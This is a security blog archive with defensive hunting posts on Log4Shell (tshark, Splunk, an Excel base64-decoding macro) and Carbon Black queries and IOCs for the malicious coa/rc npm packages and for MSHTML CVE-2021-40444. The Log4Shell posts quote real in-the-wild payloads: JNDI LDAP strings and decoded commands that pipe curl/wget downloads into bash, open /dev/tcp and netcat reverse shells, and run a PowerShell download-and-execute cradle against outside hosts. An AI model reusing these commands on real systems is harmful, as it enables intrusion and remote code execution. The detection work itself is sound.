Tag Archives: hunting

Hunting for Log4j RCE (CVE-2021-44228) using RSA Netwitness

Leave a reply

So, if you read my previous article; Hunting for Log4j RCE (CVE-2021-44228) using Splunk & Excel, last time we leveraging Splunk as our platform to hunt event/logs related to this Log4J vulnerability.

This time, we’re using RSA Netwitness; which we going to hunt this Log4Shell attempt thru pcap.

If you never seen how’s the RSA Netwitness interface looks like, here are the screenshot of the tools:

After you have gathered the pcap, we can use tshark to extract relevant field/result that we want.

Tshark command and filters that we’ll using:

"C:\Program Files\Wireshark\tshark.exe" -r your_pcap.pcap -Y "ip contains Base64 && http.request && ip contains jndi" -T fields -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -e http.request.method -e http.request.uri -e http.response.code -e http.user_agent -e http.referer -E header=y -E separator=; > out.txt

Example of the output:

ip.src	tcp.srcport	ip.dst	tcp.dstport	http.request.method	http.request.uri	http.response.code	http.user_agent	http.referer
143.244.156.104	37058	X.X.X.X	8080	GET	/		${jndi:ldap://135.148.132.224:1389/Basic/Command/Base64/d2dldCBodHRwOi8vMTUyLjY3LjYzLjE1MC9weTsgY3VybCAtTyBodHRwOi8vMTUyLjY3LjYzLjE1MC9weTsgY2htb2QgNzc3IHB5OyAuL3B5IHJjZS54ODY=}

If we decoded the base64 above:

wget http://152[.]67[.]63[.]150/py; curl -O http://152[.]67[.]63[.]150/py; chmod 777 py; ./py rce.x86

Hunting for Log4j RCE (CVE-2021-44228) using Splunk & Excel

1 Reply

As you are aware, there are new Log4j vuln (CVE-2021-44228) vuln been disclosed and exploited in the wild currently.

So, I’m using Splunk query as below; based from Splunk blog [1] to see if there is attempt to use this vuln/exploit towards our assets:

index=* "${jndi:*" Base64 
| eval _time_UTC = _time - (strptime("2000-01-01 +00:00", "%F %:z") - strptime("2000-01-01 " . strftime(_time,"%:z"), "%F %Z")) 
| eval time_in_UTC = strftime(_time_UTC, "%F %T UTC") 
| rex field=_raw "[jJnNdDiI]{4}(\:|\%3A|\/|\%2F)(?<proto>\w+)(\:\/\/|\%3A\%2F\%2F)(\$\{.*?\}(\.)?)?(?<rce_dest>[a-zA-Z0-9\.\-\_\$\{\:]+)" 
| rex field=_raw "\/Base64\/(?<string>\S+)}" 
| table time_in_UTC proto rce_dest string sourcetype

As you can see, there are numbers of attempt observed towards our infra for past 7 days:

The raw event looks something like this:

2021-12-10 19:27:20 X.X.X.X GET /owa/auth/logon.aspx url=https%3a%2f%2fX.X.X.X%2fowa%2f&reason=0&CorrelationID=<empty>;&ClientId=AGS0JSW0AJIUEPWEVZ&cafeReqId=13016af6-7c1b-4e2f-b148-1cc2399d2b08; 443 - X.X.X.X ${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC9YLlguWC5YOjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC9YLlguWC4xODo0NDMpfGJhc2g=} https://X.X.X.X/owa/ 200 0 0 0

Using the Splunk query above, it will show you a table formatted data which contains extracted base64 under field named “string“.

The result after we export it from Splunk (opened in Excel) looks like:

If you decode the base64 from the example of raw event above:

KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC9YLlguWC5YOjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC9YLlguWC4xODo0NDMpfGJhc2g=

It appear to be a curl & wget attempt towards our infra:

(curl -s 45.155.205.233:5874/X.X.X.X:443||wget -q -O- 45.155.205.233:5874/X.X.X.X:443)|bash

I’m wondering.. How can I quickly decode all these base64 strings? We not gonna decode it one-by-one aren’t we? There are hundreds or probably thousand of it.

So… We going to leverage Excel & macro (yes. you read it right. MACRO) to automatically decode those base64 strings for us. We going to Excel-Fu out of this data.

The macro code that we’ll be using as below:

Function TextBase64Encode(strText, strCharset)

    Dim arrBytes

    With CreateObject("ADODB.Stream")
        .Type = 2 ' adTypeText
        .Open
        .Charset = strCharset
        .WriteText strText
        .Position = 0
        .Type = 1 ' adTypeBinary
        arrBytes = .Read
        .Close
    End With

    With CreateObject("MSXML2.DOMDocument").createElement("tmp")
        .DataType = "bin.base64"
        .nodeTypedValue = arrBytes
        TextBase64Encode = Replace(Replace(.Text, vbCr, ""), vbLf, "")
    End With

End Function

Function TextBase64Decode(strBase64, strCharset)

    Dim arrBinary

    With CreateObject("MSXML2.DOMDocument").createElement("tmp")
        .DataType = "bin.base64"
        .Text = strBase64
        arrBinary = .nodeTypedValue
    End With

    With CreateObject("ADODB.Stream")
        .Type = 1 ' adTypeBinary
        .Open
        .Write arrBinary
        .Position = 0
        .Type = 2 ' adTypeText
        .Charset = strCharset
        TextBase64Decode = .ReadText
        .Close
    End With

End Function

To use it, first, we need to open the Splunk result that we exported earlier.

After that, press Alt-F8 to open the macro editor. Create new macro – you can give any name you want. For example, I named it “Base64“:

It will then open a new window. Paste macro code given above inside the editor:

After that, close the editor window. Just leave the Excel open.

Then, create 2 new column in the Excel sheet; column named “ASCII” and “Decoded Base64“:

We need to fill up column “ASCII” with string “ASCII” until end/bottom of your data. Let’s say you have 300 row of data in your Excel, then fill 300 of “ASCII” strings besides it.

Just press Ctrl + Arrow-Down to quickly go to end/bottom of data column. After that, type in string “ASCII” in one of the row and copy it (Ctrl-C). Then, press Ctrl + Shift + Arrow-Up to select from bottom to top. Then paste/Ctrl + V to fill all column with string “ASCII“.

Your Excel will look something like this:

Next, we going to start decoding the base64 strings.

Again, press Ctrl + Arrow-Down to go end of column, and type the formula as below:

=TextBase64Decode(<column-string>,<column-ASCII>)

Refer example as below:

Then, again, copy column with the formula, Ctrl + Shift + Arrow-Up to select from bottom to top & paste/Ctrl + V the formula into all selected column; under “Decoded Base64“.

That’s it. We have successfully decoded all the base64 strings via Excel.

List of attempt that I’ve observed so far:

(curl http://177.52.40.22:5000/xpert/app/lib/locawebstyle/dist/javascripts/log.php || wget -q -O- http://177.52.40.22:5000/xpert/app/lib/locawebstyle/dist/javascripts/log.php)|bash
(curl -S https://www.econ-jobs.com/Scripts/op.php||wget https://www.econ-jobs.com/Scripts/op.php)|bash
/bin/bash -i >& /dev/tcp/141.105.65.94/81
bash -i  >& /dev/tcp/139.59.138.109/8080 0>&1
bash -i >& /dev/tcp/141.105.65.94/443 0>&1
cmd.exe /c powershell.exe -c Invoke-WebRequest http://177.52.40.22:5000/xpert/app/lib/locawebstyle/dist/javascripts/log.php
dig $(whoami).c6sp7vq2vtc0000xa9y0gdc5d7hyyyyyb.interactsh.com
dig $(whoami).wjj96oqhn65ebgyqdrh6lt7o6fc80x.burpcollaborator.net
nc 165.22.213.147 8888 -e /bin/bash ; curl http://165.22.213.147:7777/backdoor.sh -o backdoor.sh ; chmod +x ./backdoor.sh ;bash backdoor.sh ; dig 
powershell -c iex ((New-Object System.Net.WebClient).DownloadString('https://textbin.net/raw/0l8h4xuvxe'))
telnet 141.105.65.94 443
touch /tmp/pwned
wget http://155.94.154.170/aaa;curl -O http://155.94.154.170/aaa;chmod 777 aaa;./aaa
wget http://194.36.188.187:9090/log/14953

References:
[1] https://www.splunk.com/en_us/blog/security/log-jammin-log4j-2-rce.html
[2] https://stackoverflow.com/questions/41572920/encoding-special-chracters-to-base64-in-excel-vba

Carbon Black query searching for malicious NPM library – coa & rc

Leave a reply

Based on GitHub Advisory Database:
https://github.com/advisories/GHSA-g2q5-5433-rhrf – Embedded malware in rc
https://github.com/advisories/GHSA-73qr-pfmq-6rp8 – Embedded malware in coa

rc affected versions:
= 1.2.9
= 1.3.9
= 2.3.9

coa affected versions:
= 2.0.3
= 2.0.4
= 2.1.1
= 2.1.3
= 3.0.1
= 3.1.3

We can utilize Carbon Black Investigate feature to see if there’s any malicious npm library been installed in our environments. Here’s the query to do that:

Search for effected coa & rc library versions:

(filemod_name:\coa-2.0.3* OR filemod_name:\coa-2.0.4* OR filemod_name:\coa-2.1.1* OR filemod_name:\coa-2.1.3* OR filemod_name:\coa-3.0.1* OR filemod_name:\coa-3.1.3* OR filemod_name:\rc-1.2.9* OR filemod_name:\rc-1.3.9* OR filemod_name:\rc-2.3.9*)

Search for possible C2:

netconn_domain:pastorcryptograph[.]at

IOC:

• pastorcryptograph[.]at
• sdd.dll from coa - SHA256: f53ef1ed12f9ba49831ea33100083c9a92bc8adc6620f8a3b36a2d9ae2eb8591
• sdd.dll from rc - SHA256: 26451f7f6fe297adf6738295b1dcc70f7678434ef21d8b6aad5ec00beb8a72cf
• sdd.dll - SHA256: 687a401007c29ee595004d93c4dd5de6c5c9f86f811f8e1d9f1ad1962507cd65

References:
https://therecord.media/malware-found-in-coa-and-rc-two-npm-packages-with-23m-weekly-downloads/
https://www.virustotal.com/gui/file/687a401007c29ee595004d93c4dd5de6c5c9f86f811f8e1d9f1ad1962507cd65/detection/
https://media.cert.europa.eu/static/SecurityAdvisories/2021/CERT-EU-SA2021-062.pdf

Carbon Black query for Microsoft MSHTML Remote Code Execution Vulnerability (CVE-2021-40444)

Leave a reply

Carbon Black query that can be use to detect if any MSHTML RCE happened (probably need to be refined more):

((process_cmdline:control.exe AND ((process_cmdline:*.inf AND process_cmdline:AppData) OR (process_cmdline:*.cpl AND process_cmdline:../)) AND -process_cmdline:*\icedrive\*) OR ((hash:6EEDF45CB91F6762DE4E35E36BCB03E5AD60CE9AC5A08CAEB7EDA035CD74762B OR hash:938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52) OR (parent_hash:6EEDF45CB91F6762DE4E35E36BCB03E5AD60CE9AC5A08CAEB7EDA035CD74762B OR parent_hash:938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52) OR (filemod_hash:6EEDF45CB91F6762DE4E35E36BCB03E5AD60CE9AC5A08CAEB7EDA035CD74762B OR filemod_hash:938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52)))

Search if any assets making connections towards IOCs (known IOCs as of 9 Sept):

netconn_domain:joxinu.com OR netconn_domain:pawevi.com OR netconn_domain:macuwuf.com

References:

IOCs:

  • hidusi.com
  • dodefoh.com
  • joxinu.com
  • pawevi.com
  • macuwuf.com
  • 23.106.160.25
  • 6EEDF45CB91F6762DE4E35E36BCB03E5AD60CE9AC5A08CAEB7EDA035CD74762B – championship.inf
  • 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 – A Letter before court 4.docx